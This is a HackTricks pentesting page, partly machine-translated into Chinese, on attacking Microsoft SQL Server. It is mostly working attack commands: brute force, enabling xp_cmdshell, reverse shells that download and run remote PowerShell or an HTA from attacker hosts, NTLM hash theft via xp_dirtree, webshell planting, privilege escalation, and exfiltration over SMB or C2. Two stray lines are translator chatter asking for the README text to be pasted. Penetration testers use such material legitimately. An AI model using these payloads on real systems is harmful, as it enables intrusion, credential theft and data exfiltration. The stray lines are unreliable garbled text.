1433 - Pentesting MSSQL - Microsoft SQL Server

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

基本信息

来自 wikipedia:

Microsoft SQL Server 是由 Microsoft 开发的 关系型数据库 管理系统。作为数据库服务器,它是一种软件产品,其主要功能是根据其他软件应用程序的请求存储和检索数据——这些应用程序可以运行在同一台计算机上,也可以通过网络(包括互联网)在另一台计算机上运行。

默认端口: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

在托管的 Database-as-a-Service (DBaaS) 环境中

Everything that depends on “owning the host” (e.g., privilege escalation, lateral movement, and OS command execution) ceases to exist in DBaaS. Pentesting in these environments must pivot to application-layer exploitation, data exfiltration via SQL logic, misconfigured IAM roles, or poor network/VPC design. For example, the Amazon RDS documentation explicitly states that xp_cmdshell and the TRUSTWORTHY database property are not supported.

Warning

你得到的是一个 database endpoint,而不是一台 server。云提供商负责管理主机 OS、数据库引擎二进制文件以及许多安全策略。

Default MS-SQL System Tables

  • master Database: 这个数据库至关重要,因为它记录了 SQL Server 实例的所有系统级别细节。
  • msdb Database: SQL Server Agent 使用此数据库来管理警报和作业的调度。
  • model Database: 作为 SQL Server 实例上每个新数据库的蓝本,诸如大小、排序规则、恢复模型等任何更改都会在新创建的数据库中反映出来。
  • Resource Database: 一个只读数据库,存放随 SQL Server 一起提供的系统对象。尽管这些对象在物理上存储于 Resource database 中,但在每个数据库的 sys 模式中逻辑呈现。
  • tempdb Database: 用作临时存储区,用于暂态对象或中间结果集。

枚举

自动枚举

如果您对该服务一无所知:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Tip

如果你 don’t have credentials,你可以尝试猜测它们。你可以使用 nmap 或 metasploit。请小心,如果使用现有用户名多次 login 失败,你可能会 block accounts

Metasploit (需要 creds)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

User Enumeration via RID Brute Force

您可以通过 MSSQL 对 RIDs (Relative Identifiers) 进行 brute-forcing 来枚举域用户。当您拥有有效凭据但权限有限时,此技术很有用:

# Using NetExec (nxc) - formerly CrackMapExec
nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000

# Examples:
nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000

# Without --local-auth for domain accounts
nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000

我没有收到要翻译的内容。请粘贴或上传 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 的文本,我会按要求翻译并保持原有的 Markdown/HTML/链接及标签不变。

[snippet]
MSSQL                    10.129.234.50   1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL                    10.129.234.50   1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL                    10.129.234.50   1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL                    10.129.234.50   1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL                    10.129.234.50   1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL                    10.129.234.50   1433   DC               1109: REDELEGATE\James.Dinkleberg
[snippet]

参数:

  • --local-auth: 使用本地认证而不是域认证
  • --rid-brute <max_rid>: 对 RIDs 进行暴力枚举,直到指定的编号(默认:4000)
  • -u: 用户名
  • -p: 密码

此技术将通过查询 MSSQL 服务器中与连续 RIDs 相关的帐户信息来枚举用户。

手动枚举

登录

MSSQLPwner

# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

常见枚举

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

获取用户

Types of MSSQL Users

# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

获取权限

  1. Securable: 定义为由 SQL Server 管理的用于访问控制的资源。它们被分类为:
  • Server – 示例包括 databases、logins、endpoints、availability groups 和 server roles。
  • Database – 示例包括 database role、application roles、schema、certificates、full text catalogs 和 users。
  • Schema – 包括 tables、views、procedures、functions、synonyms 等。
  1. Permission: 与 SQL Server securables 相关联的权限,例如 ALTER、CONTROL 和 CREATE,可以被授予给 principal。权限管理发生在两个层级:
  • Server Level 使用 logins
  • Database Level 使用 users
  1. Principal: 该术语指被授予对 securable 权限的实体。Principals 主要包括 logins 和 database users。对 securables 的访问控制通过授予或拒绝权限,或将 logins 和 users 包含在具有访问权的 roles 中来实施。
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

技巧

执行操作系统命令

Caution

请注意,要能够执行命令,不仅需要 xp_cmdshell 已启用,还需要拥有 xp_cmdshell 存储过程上的 EXECUTE 权限。您可以使用以下命令来获取哪些用户(除系统管理员外)可以使用 xp_cmdshell

Use master
EXEC sp_helprotect 'xp_cmdshell'

# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

MSSQLPwner

# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

基于 WMI 的远程 SQL 收集 (sqlcmd + CSV 导出)

操作人员可以从 IIS/app tier pivot 到 SQL 服务器,使用 WMI 执行一个小的批处理文件,对 MSSQL 进行身份验证并运行临时查询,然后将结果导出为 CSV。这样可以保持收集简单,并与 admin 活动相融合。

示例 mssq.bat

@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

通过 WMI 远程调用它

wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell 替代方案

$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

注意事项

  • sqlcmd 可能缺失;可退回使用 osql、PowerShell Invoke-Sqlcmd,或使用 System.Data.SqlClient 的一行命令。
  • 注意引号;较长/复杂的查询更易通过文件提供,或作为 Base64‑encoded 参数在批处理/PowerShell 存根内解码。
  • 通过 SMB 外传 CSV(例如,从 \SQLHOST\C$\Windows\Temp 复制),或压缩后通过 C2 转移。

获取哈希密码

SELECT * FROM master.sys.syslogins;

Steal NetNTLM hash / Relay attack

你应该启动一个 SMB server 来捕获认证中使用的哈希(例如 impacket-smbserverresponder)。

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Warning

你可以检查谁(除系统管理员外)有权限运行这些 MSSQL 函数:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

Using tools such as responder or Inveigh it’s possible to steal the NetNTLM hash.
你可以在以下位置看到如何使用这些工具:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

滥用 MSSQL 受信任的链接

Read this post 以了解有关如何滥用此功能的更多信息:

MSSQL AD Abuse

写入文件

要使用 MSSQL 写入文件,我们 需要启用 Ole Automation Procedures,(这需要管理员权限),然后执行一些存储过程来创建文件:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

使用 OPENROWSET 读取文件

默认情况下,MSSQL 允许对该账户具有读取权限的操作系统中的任何文件进行读取。我们可以使用以下 SQL 查询:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

但是,BULK 选项需要 ADMINISTER BULK OPERATIONSADMINISTER DATABASE BULK OPERATIONS 权限。

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

用于 SQLi 的基于错误的向量:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/读取文件并执行脚本 (Python and R)

MSSQL 可能允许你执行 scripts in Python and/or R。这些代码将由一个 不同的用户 来执行,而不是使用 xp_cmdshell 来执行命令的用户。

示例尝试执行一个 ‘R’ “Hellow World!” 不起作用

示例:使用已配置的 python 来执行若干操作:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

读取注册表

Microsoft SQL Server 提供了 多个扩展存储过程,这些过程允许你不仅与网络交互,还可以与文件系统甚至 Windows Registry

常规实例感知
sys.xp_regreadsys.xp_instance_regread
sys.xp_regenumvaluessys.xp_instance_regenumvalues
sys.xp_regenumkeyssys.xp_instance_regenumkeys
sys.xp_regwritesys.xp_instance_regwrite
sys.xp_regdeletevaluesys.xp_instance_regdeletevalue
sys.xp_regdeletekeysys.xp_instance_regdeletekey
sys.xp_regaddmultistringsys.xp_instance_regaddmultistring
sys.xp_regremovemultistringsys.xp_instance_regremovemultistring
 
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

For more examples check out the original source.

RCE with MSSQL User Defined Function - SQLHttp

可以通过自定义函数在 MSSQL 中加载 .NET dll。然而,这需要 dbo 访问权限,因此你需要以数据库**sa 或 管理员角色**的身份连接。

Following this link 查看示例。

RCE with autoadmin_task_agents

根据 to this post,也可以加载远程 dll 并使 MSSQL 以类似的方式执行它:

update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";

请粘贴 src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 的内容,或上传要翻译的文本。

using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{

Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}

public override void DoWork()
{

}

public override void ExternalJob(string command, LogBaseService jobLogger)
{

}

public override void Start(IServicesFactory services)
{

}

public override void Stop()
{

}


public void Test()
{

}
}
}

Other ways for RCE

还有其他方法可以获得命令执行,例如添加 extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, 和 external scripts.

MSSQL Privilege Escalation

From db_owner to sysadmin

如果一个 普通用户 被赋予对由 admin 用户(例如 sa)拥有的数据库的角色 db_owner,并且该数据库被配置为 trustworthy,该用户可以滥用这些权限进行 privesc,因为在该数据库中创建的 stored procedures 可以作为所有者(adminexecute

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')

你可以使用一个 metasploit 模块:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

或者一个 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

Impersonation of other users

SQL Server 有一个特殊权限,名为 IMPERSONATE,它允许执行用户获得另一个用户或 login 的权限,直到上下文被重置或 session 结束。

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

Tip

如果你能 impersonate 一个用户,即使他不是 sysadmin,你应该检查 该用户是否有权访问 其他 databases 或 linked servers。

注意,一旦你成为 sysadmin,你就可以 impersonate 任何其他用户:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

您可以使用一个 metasploit 模块执行此攻击:

msf> auxiliary/admin/mssql/mssql_escalate_execute_as

或使用 PS 脚本:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Using MSSQL for Persistence

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Extracting passwords from SQL Server Linked Servers

攻击者可以从 SQL Instances 中提取 SQL Server Linked Servers 的密码并以明文获取它们,这会让攻击者获得可用于在目标上取得更大立足点的凭据。用于提取和解密存储在 Linked Servers 中密码的脚本可以在 here 找到。

为了使此利用生效,必须满足一些先决条件并进行相应配置。首先,你必须在机器上具有 Administrator 权限,或具备管理 SQL Server Configurations 的能力。

在验证权限后,你需要配置三件事,分别如下:

  1. Enable TCP/IP on the SQL Server instances;
  2. Add a Start Up parameter, in this case, a trace flag will be added, which is -T7806.
  3. Enable remote admin connection.

为自动化这些配置,this repository 提供了所需脚本。除了为配置的每个步骤提供 powershell script 外,该 repository 还包含一个组合了配置脚本以及密码提取和解密的完整脚本。

更多信息请参考以下关于此攻击的链接: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

Local Privilege Escalation

The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator following one of these 2 paged:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

JuicyPotato

Shodan

  • port:1433 !HTTP

References

HackTricks Automatic Commands

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks